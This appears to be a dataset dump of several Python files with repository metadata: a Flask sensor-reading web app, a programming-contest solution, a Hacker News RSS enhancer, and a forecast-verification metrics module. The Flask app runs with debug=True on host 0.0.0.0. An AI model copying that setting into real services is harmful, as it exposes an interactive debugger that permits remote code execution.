from lywsd03mmc import Lywsd03mmcClient #need to install
from load_json import read_json
from time import gmtime, strftime
app = Flask(__name__)
@app.route("/temp")
def temperature():
mac_ads, room = read_json()
all_text = ""
for eath in range(len(mac_ads)):
header = ('<p>'+room[eath]+' '+'<p>'+mac_ads[eath]+'<br><br>')
mac_ad = (mac_ads[eath])
client = Lywsd03mmcClient(mac_ad)
client.connect()
data = client.data
all_text = all_text + "<br>"+strftime("%Y-%m-%d %H:%M:%S", gmtime())+ header + ('Temperature: ' + str(data.temperature) +' <br> '
+'Humidity: ' + str(data.humidity)+' <br> '+'Battery: ' + str(data.battery)+' <br> '
+'Display units: ' + client.units)+'<br>__________________________'
return all_text
if __name__ == "__main__":
app.run(host='0.0.0.0', port = 8333, threaded = True, debug = True) #try app.ran() if you wont run tha app localy
| [
"naz@naz.com"
] | naz@naz.com |
a381405f3e7de92702f28ddc67b8a4d3d57494cd | 7bd5ca970fbbe4a3ed0c7dadcf43ba8681a737f3 | /aoj/aoj-icpc/300/1315.py | fc47a7e25bc9e18a6c15f3d4e5a4aeac5a025693 | [] | no_license | roiti46/Contest | c0c35478cd80f675965d10b1a371e44084f9b6ee | c4b850d76796c5388d2e0d2234f90dc8acfaadfa | refs/heads/master | 2021-01-17T13:23:30.551754 | 2017-12-10T13:06:42 | 2017-12-10T13:06:42 | 27,001,893 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 575 | py | while 1:
n = int(raw_input())
if n == 0: break
exist = set([])
enter = [0]*1000
bless = [0]*1000
for loop in xrange(n):
md,hm,io,p = raw_input().split()
h,m = map(int,hm.split(":"))
t = 60*h+m
p = int(p)
if io == "I":
enter[p] = t
exist.add(p)
else:
exist.remove(p)
if p == 0:
for i in exist: bless[i] += t-max(enter[p],enter[i])
elif 0 in exist:
bless[p] += t-max(enter[0],enter[p])
print max(bless)
| [
"roiti46@gmail.com"
] | roiti46@gmail.com |
9bda09594d5730e2c39a6b22d8055f740cd68790 | 5c869e507e968eeb8ce4a4f8a3dae0ef04163185 | /docassist/test.py | 2bfd70151634cf657b97be840999f1feb8c43bca | [] | no_license | priyanshsaxena/DocAssist | c40ccc5fdb1cb3f870676d0de70d0039ee67c65b | 26b8cbb5be3a6b2f01505b994cae38cf63297e71 | refs/heads/master | 2021-01-22T05:47:44.854456 | 2017-02-12T07:08:51 | 2017-02-12T07:08:51 | 81,707,831 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,981 | py | """
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from xml.sax.saxutils import escape
import urllib, re, os, urlparse
import HTMLParser, feedparser
from BeautifulSoup import BeautifulSoup
from pprint import pprint
import codecs
import sys
streamWriter = codecs.lookup('utf-8')[-1]
sys.stdout = streamWriter(sys.stdout)
HN_RSS_FEED = "http://news.ycombinator.com/rss"
NEGATIVE = re.compile("comment|meta|footer|footnote|foot")
POSITIVE = re.compile("post|hentry|entry|content|text|body|article")
PUNCTUATION = re.compile("""[!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~]""")
def grabContent(link, html):
replaceBrs = re.compile("<br */? *>[ \r\n]*<br */? *>")
html = re.sub(replaceBrs, "</p><p>", html)
try:
soup = BeautifulSoup(html)
except HTMLParser.HTMLParseError:
return ""
# REMOVE SCRIPTS
for s in soup.findAll("script"):
s.extract()
allParagraphs = soup.findAll("p")
topParent = None
parents = []
for paragraph in allParagraphs:
parent = paragraph.parent
if (parent not in parents):
parents.append(parent)
parent.score = 0
if (parent.has_key("class")):
if (NEGATIVE.match(parent["class"])):
parent.score -= 50
if (POSITIVE.match(parent["class"])):
parent.score += 25
if (parent.has_key("id")):
if (NEGATIVE.match(parent["id"])):
parent.score -= 50
if (POSITIVE.match(parent["id"])):
parent.score += 25
if (parent.score == None):
parent.score = 0
innerText = paragraph.renderContents() #"".join(paragraph.findAll(text=True))
if (len(innerText) > 10):
parent.score += 1
parent.score += innerText.count(",")
for parent in parents:
if ((not topParent) or (parent.score > topParent.score)):
topParent = parent
if (not topParent):
return ""
# REMOVE LINK'D STYLES
styleLinks = soup.findAll("link", attrs={"type" : "text/css"})
for s in styleLinks:
s.extract()
# REMOVE ON PAGE STYLES
for s in soup.findAll("style"):
s.extract()
# CLEAN STYLES FROM ELEMENTS IN TOP PARENT
for ele in topParent.findAll(True):
del(ele['style'])
del(ele['class'])
killDivs(topParent)
clean(topParent, "form")
clean(topParent, "object")
clean(topParent, "iframe")
fixLinks(topParent, link)
return topParent.renderContents()
def fixLinks(parent, link):
tags = parent.findAll(True)
for t in tags:
if (t.has_key("href")):
t["href"] = urlparse.urljoin(link, t["href"])
if (t.has_key("src")):
t["src"] = urlparse.urljoin(link, t["src"])
def clean(top, tag, minWords=10000):
tags = top.findAll(tag)
for t in tags:
if (t.renderContents().count(" ") < minWords):
t.extract()
def killDivs(parent):
divs = parent.findAll("div")
for d in divs:
p = len(d.findAll("p"))
img = len(d.findAll("img"))
li = len(d.findAll("li"))
a = len(d.findAll("a"))
embed = len(d.findAll("embed"))
pre = len(d.findAll("pre"))
code = len(d.findAll("code"))
if (d.renderContents().count(",") < 10):
if ((pre == 0) and (code == 0)):
if ((img > p ) or (li > p) or (a > p) or (p == 0) or (embed > 0)):
d.extract()
def upgradeLink(link):
link = link.encode('utf-8')
if (not (link.startswith("http://news.ycombinator.com") or link.endswith(".pdf"))):
linkFile = "upgraded/" + re.sub(PUNCTUATION, "_", link)
if (os.path.exists(linkFile)):
return open(linkFile).read()
else:
content = ""
try:
html = urllib.urlopen(link).read()
content = grabContent(link, html)
filp = open(linkFile, "w")
filp.write(content)
filp.close()
except IOError:
pass
return content
else:
return ""
def upgradeFeed(feedUrl):
feedData = urllib.urlopen(feedUrl).read()
upgradedLinks = []
parsedFeed = feedparser.parse(feedData)
for entry in parsedFeed.entries:
upgradedLinks.append((entry, upgradeLink(entry.link)))
rss = """<rss version="2.0">
<channel>
<title>Hacker News</title>
<link>http://news.ycombinator.com/</link>
<description>Links for the intellectually curious, ranked by readers.</description>
"""
for entry, content in upgradedLinks:
rss += u"""
<item>
<title>%s</title>
<link>%s</link>
<comments>%s</comments>
<description>
<![CDATA[<a href="%s">Comments</a><br/>%s<br/><a href="%s">Comments</a>]]>
</description>
</item>
""" % (entry.title, escape(entry.link), escape(entry.comments), entry.comments, content.decode('utf-8'), entry.comments)
rss += """
</channel>
</rss>"""
return rss
if __name__ == "__main__":
print upgradeFeed(HN_RSS_FEED)
| [
"geniuspriyansh@gmail.com"
] | geniuspriyansh@gmail.com |
f23c206436ec78827ec7cbc0ab57a7c924a38e64 | 70087a0720037639297825a66135b9c985bbf586 | /verif/metric.py | 93c65c9b670eb008b0ef357dbd97079fe6539478 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | rvalenzuelar/verif | 1ab854e2433a69378af8a867a1fb6f0efd1a4de0 | 034188cabd3a29136433be2ecb2f6555d3c03da8 | refs/heads/master | 2020-03-30T21:39:27.128496 | 2018-05-13T16:04:38 | 2018-05-13T17:48:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 48,947 | py | import inspect
import metric_type
import numpy as np
import sys
import scipy.stats
import verif.aggregator
import verif.axis
import verif.interval
import verif.util
def get_all():
"""
Returns a dictionary of all metric classes where the key is the class
name (string) and the value is the class object
"""
temp = inspect.getmembers(sys.modules[__name__], inspect.isclass)
return temp
def get_all_by_type(type):
"""
Like get_all, except only return metrics that are of a cerrtain
verif.metric_type
"""
temp = [m for m in get_all() if m[1].type == type]
return temp
def get_all_obs_fcst_based():
""" Like get_all, except only return obs-fcst-based metric classes """
metrics = [metric for metric in get_all() if issubclass(metric[1], verif.metric.ObsFcstBased)]
return metrics
def get(name):
""" Returns an instance of an object with the given class name """
metrics = get_all()
m = None
for metric in metrics:
if name == metric[0].lower() and metric[1].is_valid():
m = metric[1]()
return m
def get_p(data, input_index, axis, axis_index, interval):
"""
Retrieves and computes forecast probability and verifying observation for
being inside interval
Returns:
obs (np.array): True when observation is inside interval
p (np.array): True when forecast is inside interval
"""
p0 = 0
p1 = 1
if interval.lower != -np.inf and interval.upper != np.inf:
var0 = verif.field.Threshold(interval.lower)
var1 = verif.field.Threshold(interval.upper)
[obs, p0, p1] = data.get_scores([verif.field.Obs(), var0, var1],
input_index, axis, axis_index)
elif interval.lower != -np.inf:
var0 = verif.field.Threshold(interval.lower)
[obs, p0] = data.get_scores([verif.field.Obs(), var0], input_index,
axis, axis_index)
elif interval.upper != np.inf:
var1 = verif.field.Threshold(interval.upper)
[obs, p1] = data.get_scores([verif.field.Obs(), var1], input_index,
axis, axis_index)
obsP = interval.within(obs)
p = p1 - p0 # Prob of obs within range
return [obsP, p]
def get_q(data, input_index, axis, axis_index, interval):
"""
Retrieve forecast quantile and verifying observation
Returns:
obs (np.array): True when observation is inside interval
p (np.array): True when forecast is inside interval
"""
p0 = 0
p1 = 1
var = verif.field.Quantile(interval.lower)
[obs, q] = data.get_scores([verif.field.Obs(), var], input_index, axis, axis_index)
return [obs, q]
class Metric(object):
""" Class to compute a score for a verification metric
Scores are computed by retrieving information from a verif.data.Data object.
As data is organized in multiple dimensions, scores are computed for a
particular verif.axis.Axis. Also data objects have several input files, so
scores are computed for a particular input.
The ObsFcstBased class offers a simple way to design a metric that only
uses observations and forecasts from data.
Class attributes:
description (str): A short one-liner describing the metric. This will show
up in the main verif documentation.
long (str): A longer description. This will show up in the
documentation when a specific metric is chosen.
min (float): Minimum possible value the metric can take on. None if no min.
max (float): Maximum possible value the metric can take on. None if no max.
require_threshold_type (str) : What type of thresholds does this metric
require? One of 'None', 'deterministic', 'threshold', 'quantile'.
supports_threshold (bool) : Does it make sense to use '-x threshold' with this metric?
supports_field (bool) : Does it make sense to use '-x obs' or '-x fcst' with this metric?
orientation (int): 1 for a positively oriented score (higher values are better),
-1 for negative, and 0 for all others
reference (str): A string with an academic reference
supports_aggregator: Does this metric use self.aggregator?
type (verif.metric_type.MetricType): What type of metric is this?
To implement a new metric:
Fill out cls.description and implement compute_core(). The other class
attributes (see above) are optional.
"""
# This must be overloaded
description = None
# Default values
long = None
reference = None
orientation = 0
min = None
max = None
default_axis = verif.axis.Leadtime() # If no axis is specified, use this axis as default
default_bin_type = None
require_threshold_type = None
supports_threshold = False
supports_field = False
perfect_score = None
aggregator = verif.aggregator.Mean()
supports_aggregator = False
type = verif.metric_type.Deterministic()
def compute(self, data, input_index, axis, interval):
""" Compute the score along an axis
Arguments:
data (verif.data.Data): data object to get information from
input_index (int): input index to compute the result for
axis (verif.axis.Axis): Axis to compute score for for
interval: Compute score for this interval (only applies to some metrics)
Returns:
np.array: A 1D numpy array of one score for each slice along axis
"""
size = data.get_axis_size(axis)
scores = np.zeros(size, 'float')
# Loop through axis indices
for axis_index in range(0, size):
x = self.compute_single(data, input_index, axis, axis_index, interval)
scores[axis_index] = x
return scores
def compute_single(self, data, input_index, axis, axis_index, interval):
""" Computes the score for a given slice
Arguments:
data (verif.data.Data): data object to get information from
input_index (int): input index to compute the result for
axis (verif.axis.Axis): Axis to compute score for for
axis_index (int): Slice along the axis
interval: Compute score for this interval (only applies to some metrics)
Returns:
float: Value representing the score for the slice
"""
raise NotImplementedError()
def label(self, variable):
""" What is an appropriate y-axis label for this metric? Override this if
the metric does not have the same units as the forecast variable """
return self.name + " (" + variable.units + ")"
class ClassProperty(property):
def __get__(self, cls, owner):
return self.fget.__get__(None, owner)()
@ClassProperty
@classmethod
def name(cls):
""" Use the class name as default
"""
return cls.get_class_name()
@classmethod
def is_valid(cls):
""" Is this a valid metric that can be initialized? """
return cls.description is not None
@classmethod
def help(cls):
s = ""
if cls.description is not None:
s = cls.description
if cls.orientation is not 0:
s = s + "\n" + verif.util.green("Orientation: ")
if cls.orientation == 1:
s = s + "Positive (higher values are better)"
elif cls.orientation == -1:
s = s + "Negative (lower values are better)"
else:
s = s + "None"
if cls.perfect_score is not None:
s = s + "\n" + verif.util.green("Perfect score: ") + str(cls.perfect_score)
if cls.min is not None:
s = s + "\n" + verif.util.green("Minimum value: ") + str(cls.min)
if cls.max is not None:
s = s + "\n" + verif.util.green("Maximum value: ") + str(cls.max)
if cls.long is not None:
s = s + "\n" + verif.util.green("Description: ") + cls.long
if cls.reference is not None:
s = s + "\n" + verif.util.green("Reference: ") + cls.reference
return s
@classmethod
def get_class_name(cls):
name = cls.__name__
return name
class ObsFcstBased(Metric):
""" Class for scores that are based on observations and deterministic forecasts only """
type = verif.metric_type.Deterministic()
supports_field = True
def compute_single(self, data, input_index, axis, axis_index, interval):
[obs, fcst] = data.get_scores([verif.field.Obs(), verif.field.Fcst()], input_index, axis, axis_index)
assert(obs.shape[0] == fcst.shape[0])
if axis == verif.axis.Obs():
I = np.where(interval.within(obs))
obs = obs[I]
fcst = fcst[I]
elif axis == verif.axis.Fcst():
I = np.where(interval.within(fcst))
obs = obs[I]
fcst = fcst[I]
return self.compute_from_obs_fcst(obs, fcst, interval)
def compute_from_obs_fcst(self, obs, fcst, interval=None):
""" Compute the score using only the observations and forecasts
obs and fcst must have the same length, but may contain nan values
Arguments:
obs (np.array): 1D array of observations
fcst (np.array): 1D array of forecasts
Returns:
float: Value of score
"""
# Remove missing values
I = np.where((np.isnan(obs) | np.isnan(fcst)) == 0)[0]
obs = obs[I]
fcst = fcst[I]
if obs.shape[0] > 0:
return self._compute_from_obs_fcst(obs, fcst)
else:
return np.nan
def _compute_from_obs_fcst(self, obs, fcst):
""" Compute the score
Obs and fcst are guaranteed to:
- have the same length
- length >= 1
- no missing values
"""
raise NotImplementedError()
class FromField(Metric):
supports_aggregator = True
supports_field = True
def __init__(self, field, aux=None):
""" Compute scores from a field
Arguments:
field (verif.field.field): Retrive data from this field
aux (verif.field.Field): When reading field, also pull values for
this field to ensure only common data points are returned
"""
self._field = field
self._aux = aux
def compute_single(self, data, input_index, axis, axis_index, interval):
fields = [self._field]
axis_pos = None
if axis == verif.axis.Obs():
if self._field != verif.field.Obs():
fields += [verif.field.Obs()]
axis_pos = len(fields) - 1
elif axis == verif.axis.Fcst():
if self._field != verif.field.Fcst():
fields += [verif.field.Fcst()]
axis_pos = len(fields) - 1
if self._aux is not None:
fields += [self._aux]
values_array = data.get_scores(fields, input_index, axis, axis_index)
values = values_array[0]
# Subset if we have a subsetting axis
if axis_pos is not None:
I = np.where(interval.within(values_array[axis_pos]))[0]
values = values[I]
return self.aggregator(values)
def label(self, variable):
return self.aggregator.name().title() + " of " + self._field.name()
class Obs(FromField):
""" Retrives the observation
Note: This cannot be a subclass of ObsFcstBased, since we don't want
to remove obs for which the forecasts are missing. Same for Fcst.
"""
type = verif.metric_type.Deterministic()
name = "Observation"
description = "Observed value"
supports_aggregator = True
orientation = 0
def __init__(self):
super(Obs, self).__init__(verif.field.Obs())
def label(self, variable):
return self.aggregator.name().title() + " of observation (" + variable.units + ")"
class Fcst(FromField):
type = verif.metric_type.Deterministic()
name = "Forecast"
description = "Forecasted value"
supports_aggregator = True
orientation = 0
def __init__(self):
super(Fcst, self).__init__(verif.field.Fcst())
def label(self, variable):
return self.aggregator.name().title() + " of forecast (" + variable.units + ")"
class Mae(ObsFcstBased):
description = "Mean absolute error"
min = 0
perfect_score = 0
supports_aggregator = True
orientation = -1
name = "Mean absolute error"
def _compute_from_obs_fcst(self, obs, fcst):
return self.aggregator(abs(obs - fcst))
def label(self, variable):
return "MAE (" + variable.units + ")"
class Bias(ObsFcstBased):
name = "Bias"
description = "Bias (forecast - observation)"
perfect_score = 0
supports_aggregator = True
orientation = 0
def _compute_from_obs_fcst(self, obs, fcst):
return self.aggregator(fcst - obs)
class Diff(ObsFcstBased):
name = "Diff"
description = "Difference in aggregated statistics (agg(forecast) - agg(observation))"
perfect_score = 0
supports_aggregator = True
orientation = 0
def _compute_from_obs_fcst(self, obs, fcst):
return self.aggregator(fcst) - self.aggregator(obs)
class Ratio(ObsFcstBased):
name = "Ratio"
description = "Ratio of aggregated statistics (agg(forecast) / agg(observation))"
perfect_score = 1
supports_aggregator = True
orientation = 0
def _compute_from_obs_fcst(self, obs, fcst):
num = self.aggregator(fcst)
denum = self.aggregator(obs)
if denum == 0:
return np.nan
return num / denum
def label(self, variable):
return "Ratio"
class Ef(ObsFcstBased):
name = "Exceedance fraction"
description = "Exeedance fraction: fraction of times that forecasts > observations"
min = 0
max = 1
perfect_score = 0.5
orientation = 0
def _compute_from_obs_fcst(self, obs, fcst):
Nfcst = np.sum(obs < fcst)
return Nfcst / 1.0 / len(fcst)
def label(self, variable):
return "Fraction fcst > obs"
class StdError(ObsFcstBased):
name = "Standard error"
description = "Standard error (i.e. RMSE if forecast had no bias)"
min = 0
perfect_score = 0
orientation = -1
def _compute_from_obs_fcst(self, obs, fcst):
bias = np.mean(obs - fcst)
return np.mean((obs - fcst - bias) ** 2) ** 0.5
class Rmse(ObsFcstBased):
name = "Root mean squared error"
description = "Root mean squared error"
min = 0
perfect_score = 0
supports_aggregator = True
orientation = -1
def _compute_from_obs_fcst(self, obs, fcst):
return self.aggregator((obs - fcst) ** 2) ** 0.5
def label(self, variable):
return "RMSE (" + variable.units + ")"
class Rmsf(ObsFcstBased):
name = "Root mean squared factor"
description = "Root mean squared factor"
min = 0
perfect_score = 1
supports_aggregator = True
orientation = 0
def _compute_from_obs_fcst(self, obs, fcst):
return np.exp(self.aggregator((np.log(fcst / obs)) ** 2) ** 0.5)
def label(self, variable):
return "RMSF (" + variable.units + ")"
class Cmae(ObsFcstBased):
name = "Cube-root mean absolute cubic error"
description = "Cube-root mean absolute cubic error"
min = 0
perfect_score = 0
supports_aggregator = True
orientation = -1
def _compute_from_obs_fcst(self, obs, fcst):
return (self.aggregator(abs(obs ** 3 - fcst ** 3))) ** (1.0 / 3)
def label(self, variable):
return "CMAE (" + variable.units + ")"
class Nsec(ObsFcstBased):
name = "Nash-Sutcliffe efficiency coefficient"
description = "Nash-Sutcliffe efficiency coefficient"
min = 0
max = 1
perfect_score = 1
orientation = 1
def _compute_from_obs_fcst(self, obs, fcst):
meanobs = np.mean(obs)
num = np.sum((fcst - obs) ** 2)
denom = np.sum((obs - meanobs) ** 2)
if denom == 0:
return np.nan
else:
return 1 - num / denom
def label(self, variable):
return "NSEC"
class Alphaindex(ObsFcstBased):
name = "Alpha index"
description = "Alpha index"
perfect_score = 0
orientation = -1
max = 2
min = 0
def _compute_from_obs_fcst(self, obs, fcst):
meanobs = np.mean(obs)
meanfcst = np.mean(fcst)
num = np.sum((fcst - obs - meanfcst + meanobs) ** 2)
denom = np.sum((fcst - meanfcst) ** 2 + (obs - meanobs) ** 2)
if denom == 0:
return np.nan
else:
return 1 - num / denom
def label(self, variable):
return self.name
class Leps(ObsFcstBased):
name = "Linear error in probability space"
description = "Linear error in probability space"
min = 0
perfect_score = 0
orientation = -1
def _compute_from_obs_fcst(self, obs, fcst):
N = len(obs)
# Compute obs quantiles
Iobs = np.array(np.argsort(obs), 'float')
qobs = Iobs / N
# Compute the quantiles that the forecasts are relative
# to the observations
qfcst = np.zeros(N, 'float')
sortobs = np.sort(obs)
for i in range(0, N):
I = np.where(fcst[i] < sortobs)[0]
if len(I > 0):
qfcst[i] = float(I[0]) / N
else:
qfcst[i] = 1
return np.mean(abs(qfcst - qobs))
def label(self, variable):
return "LEPS"
class Dmb(ObsFcstBased):
name = "Degree of mass balance"
description = "Degree of mass balance (obs/fcst)"
perfect_score = 1
orientation = 0
def _compute_from_obs_fcst(self, obs, fcst):
return np.mean(obs) / np.mean(fcst)
def label(self, variable):
return self.description
class Mbias(ObsFcstBased):
name = "Multiplicative bias"
description = "Multiplicative bias (fcst/obs)"
perfect_score = 1
orientation = 0
def _compute_from_obs_fcst(self, obs, fcst):
num = np.nanmean(fcst)
denum = np.nanmean(obs)
if denum == 0:
return np.nan
return num / denum
def label(self, variable):
return self.description
class Corr(ObsFcstBased):
name = "Correlation"
description = "Correlation between observations and forecasts"
min = 0 # Technically -1, but values below 0 are not as interesting
max = 1
perfect_score = 1
orientation = 1
def _compute_from_obs_fcst(self, obs, fcst):
if len(obs) <= 1:
return np.nan
if np.var(fcst) == 0:
return np.nan
return np.corrcoef(obs, fcst)[1, 0]
def label(self, variable):
return self.name
class RankCorr(ObsFcstBased):
name = "Rank correlation"
description = "Rank correlation between observations and forecasts"
min = 0 # Technically -1, but values below 0 are not as interesting
max = 1
perfect_score = 1
orientation = 1
def _compute_from_obs_fcst(self, obs, fcst):
if len(obs) <= 1:
return np.nan
return scipy.stats.spearmanr(obs, fcst)[0]
def label(self, variable):
return self.name
class KendallCorr(ObsFcstBased):
name = "Kendall correlation"
description = "Kendall correlation between observations and forecasts"
min = 0 # Technically -1, but values below 0 are not as interesting
max = 1
perfect_score = 1
orientation = 1
def _compute_from_obs_fcst(self, obs, fcst):
if len(obs) <= 1:
return np.nan
if np.var(fcst) == 0:
return np.nan
return scipy.stats.kendalltau(obs, fcst)[0]
def label(self, variable):
return self.name
class DError(ObsFcstBased):
name = "Distribution Error"
description = "Distribution error"
min = 0
perfect_score = 0
supports_aggregator = False
orientation = -1
def _compute_from_obs_fcst(self, obs, fcst):
sortedobs = np.sort(obs)
sortedfcst = np.sort(fcst)
return np.mean(np.abs(sortedobs - sortedfcst))
class Pit(Metric):
""" Retrives the PIT-value corresponding to the observation """
type = verif.metric_type.Probabilistic()
name = "Probability integral transform"
description = "Verifying PIT-value (CDF at observation)"
supports_aggregator = True
orientation = 0
def compute_single(self, data, input_index, axis, axis_index, interval):
pit = data.get_scores(verif.field.Pit(), input_index, axis, axis_index)
return self.aggregator(pit)
def label(self, variable):
return self.aggregator.name().title() + " of verifying PIT"
class PitHistDev(Metric):
type = verif.metric_type.Probabilistic()
name = "PIT histogram deviation factor"
description = "PIT histogram deviation factor (actual deviation / expected deviation)"
min = 0
# max = 1
perfect_score = 1
orientation = -1
def __init__(self, numBins=11, field=verif.field.Pit()):
self._bins = np.linspace(0, 1, numBins)
self._field = field
def compute_single(self, data, input_index, axis, axis_index, interval):
pit = data.get_scores(self._field, input_index, axis, axis_index)
nb = len(self._bins) - 1
D = self.deviation(pit, nb)
D0 = self.expected_deviation(pit, nb)
dev = D / D0
return dev
def label(self, variable):
return self.name
@staticmethod
def expected_deviation(values, numBins):
if len(values) == 0 or numBins == 0:
return np.nan
return np.sqrt((1.0 - 1.0 / numBins) / (len(values) * numBins))
@staticmethod
def deviation(values, numBins):
if len(values) == 0 or numBins == 0:
return np.nan
x = np.linspace(0, 1, numBins + 1)
n = np.histogram(values, x)[0]
n = n * 1.0 / sum(n)
return np.sqrt(1.0 / numBins * np.sum((n - 1.0 / numBins) ** 2))
@staticmethod
def deviation_std(values, numBins):
if len(values) == 0 or numBins == 0:
return np.nan
n = len(values)
p = 1.0 / numBins
numPerBinStd = np.sqrt(n * p * (1 - p))
std = numPerBinStd / n
return std
# What reduction in ignorance is possible by calibrating the PIT-histogram?
@staticmethod
def ignorance_potential(values, numBins):
if len(values) == 0 or numBins == 0:
return np.nan
x = np.linspace(0, 1, numBins + 1)
n = np.histogram(values, x)[0]
n = n * 1.0 / sum(n)
expected = 1.0 / numBins
ign = np.sum(n * np.log2(n / expected)) / sum(n)
return ign
class PitHistSlope(Metric):
type = verif.metric_type.Probabilistic()
name = "PIT histogram slope"
description = "Average slope of the PIT histogram. Positive mean too many obs in the higher ranks."
perfect_score = 0
orientation = 0
def __init__(self, numBins=11, field=verif.field.Pit()):
self._bins = np.linspace(0, 1, numBins)
self._field = field
def compute_single(self, data, input_index, axis, axis_index, interval):
# Create a PIT histogram, then compute the average slope across the bars
pit = data.get_scores(self._field, input_index, axis, axis_index)
n = np.histogram(pit, self._bins)[0]
n = n * 1.0 / sum(n)
centers = (self._bins[1:] + self._bins[0:-1]) / 2
dx = np.diff(centers)
d = np.diff(n) / dx
return np.mean(d)
def label(self, variable):
return self.name
class PitHistShape(Metric):
type = verif.metric_type.Probabilistic()
name = "PIT histogram shape"
description = "Second derivative of the PIT histogram. Negative means U-shaped."
perfect_score = 0
orientation = 0
def __init__(self, numBins=11, field=verif.field.Pit()):
self._bins = np.linspace(0, 1, numBins)
self._field = field
def compute_single(self, data, input_index, axis, axis_index, interval):
# Create a PIT histogram, then compute the second derivative across the bars
pit = data.get_scores(self._field, input_index, axis, axis_index)
n = np.histogram(pit, self._bins)[0]
n = n * 1.0 / sum(n)
centers = (self._bins[1:] + self._bins[0:-1]) / 2
dx = np.diff(centers)
d = np.diff(n) / dx
centers2 = (centers[1:] + centers[0:-1]) / 2
dx2 = np.diff(centers2)
dd = np.diff(d) / dx2
return np.mean(dd)
def label(self, variable):
return self.name
class MarginalRatio(Metric):
type = verif.metric_type.Probabilistic()
name = "Marginal ratio"
description = "Ratio of marginal probability of obs to marginal" \
" probability of fcst. Use -r to specify thresholds."
min = 0
perfect_score = 1
require_threshold_type = "threshold"
supports_threshold = True
default_axis = verif.axis.Threshold()
orientation = 0
def compute_single(self, data, input_index, axis, axis_index, interval):
if np.isinf(interval.lower):
pvar = verif.field.Threshold(interval.upper)
[obs, p1] = data.get_scores([verif.field.Obs(), pvar], input_index, axis, axis_index)
p0 = 0 * p1
elif np.isinf(interval.upper):
pvar = verif.field.Threshold(interval.lower)
[obs, p0] = data.get_scores([verif.field.Obs(), pvar], input_index,
axis, axis_index)
p1 = 0 * p0 + 1
else:
pvar0 = verif.field.Threshold(interval.lower)
pvar1 = verif.field.Threshold(interval.upper)
[obs, p0, p1] = data.get_scores([verif.field.Obs(), pvar0, pvar1],
input_index, axis, axis_index)
obs = interval.within(obs)
p = p1 - p0
if np.mean(p) == 0:
return np.nan
return np.mean(obs) / np.mean(p)
def label(self, variable):
return "Ratio of marginal probs: Pobs/Pfcst"
class Within(Metric):
type = verif.metric_type.Deterministic()
""" Can't be a subclass of ObsFcstBased, because it depends on threshold
"""
name = "Within"
description = "The percentage of forecasts within some error bound. Use -r to specify error bounds"
min = 0
max = 100
default_bin_type = "below"
require_threshold_type = "threshold"
supports_threshold = True
perfect_score = 100
orientation = 0
def compute_single(self, data, input_index, axis, axis_index, interval):
[obs, fcst] = data.get_scores([verif.field.Obs(),
verif.field.Fcst()], input_index, axis, axis_index)
return self.compute_from_obs_fcst(obs, fcst, interval)
def compute_from_obs_fcst(self, obs, fcst, interval):
diff = abs(obs - fcst)
return np.mean(interval.within(diff)) * 100
def label(self, variable):
return "% of forecasts"
class Conditional(Metric):
"""
Computes the mean y conditioned on x. For a given range of x-values, what is
the average y-value?
"""
type = verif.metric_type.Deterministic()
orientation = 0
def __init__(self, x=verif.field.Obs(), y=verif.field.Fcst(), func=np.mean):
self._x = x
self._y = y
self._func = func
def compute_single(self, data, input_index, axis, axis_index, interval):
[obs, fcst] = data.get_scores([self._x, self._y], input_index, axis, axis_index)
return self.compute_from_obs_fcst(obs, fcst, interval)
def compute_from_obs_fcst(self, obs, fcst, interval):
I = np.where(interval.within(obs))[0]
if len(I) == 0:
return np.nan
return self._func(fcst[I])
class XConditional(Metric):
"""
Mean x when conditioned on x. Average x-value that is within a given range.
The reason the y-variable is added is to ensure that the same data is used
for this metric as for the Conditional metric.
"""
type = verif.metric_type.Deterministic()
orientation = 0
def __init__(self, x=verif.field.Obs(), y=verif.field.Fcst(), func=np.median):
self._x = x
self._y = y
self._func = func
def compute_single(self, data, input_index, axis, axis_index, interval):
[obs, fcst] = data.get_scores([self._x, self._y], input_index, axis, axis_index)
return self.compute_from_obs_fcst(obs, fcst, interval)
def compute_from_obs_fcst(self, obs, fcst, interval):
I = np.where(interval.within(obs))[0]
if len(I) == 0:
return np.nan
return self._func(obs[I])
class Count(Metric):
"""
Counts how many values of a specific variable is within the threshold range
Not a real metric.
"""
type = verif.metric_type.Deterministic()
orientation = 0
def __init__(self, x):
self._x = x
def compute_single(self, data, input_index, axis, axis_index, interval):
values = data.get_scores(self._x, input_index, axis, axis_index)
I = np.where(interval.within(values))[0]
if len(I) == 0:
return np.nan
return len(I)
class Quantile(Metric):
type = verif.metric_type.Probabilistic()
min = 0
max = 1
def __init__(self, quantile):
self._quantile = quantile
def compute_single(self, data, input_index, axis, axis_index, interval):
var = verif.field.Quantile(self._quantile)
scores = data.get_scores(var, input_index, axis, axis_index)
return verif.util.nanmean(scores)
class Bs(Metric):
type = verif.metric_type.Probabilistic()
name = "Brier score"
description = "Brier score"
min = 0
max = 1
default_axis = verif.axis.Threshold()
require_threshold_type = "threshold"
supports_threshold = True
perfect_score = 0
orientation = -1
reference = "Glenn W. Brier, 1950: Verification of forecasts expressed in terms of probability. Mon. Wea. Rev., 78, 1-3."
def compute_single(self, data, input_index, axis, axis_index, interval):
""" Compute probabilities based on thresholds """
[obsP, p] = get_p(data, input_index, axis, axis_index, interval)
return self.compute_from_obs_fcst(obsP, p)
def compute_from_obs_fcst(self, obs, fcst):
bs = np.nan * np.zeros(len(obs), 'float')
return np.nanmean((fcst-obs)**2)
def label(self, variable):
return self.name
class BsRel(Metric):
default_axis = verif.axis.Threshold()
type = verif.metric_type.Probabilistic()
name = "brier skill score, reliability term"
description = "Brier score, reliability term"
min = 0
max = 1
require_threshold_type = "threshold"
supports_threshold = True
perfect_score = 0
orientation = -1
def __init__(self, num_edges=11):
self._edges = np.linspace(0, 1, num_edges)
self._edges[-1] = 1.001
def compute_single(self, data, input_index, axis, axis_index, interval):
[obsP, p] = get_p(data, input_index, axis, axis_index, interval)
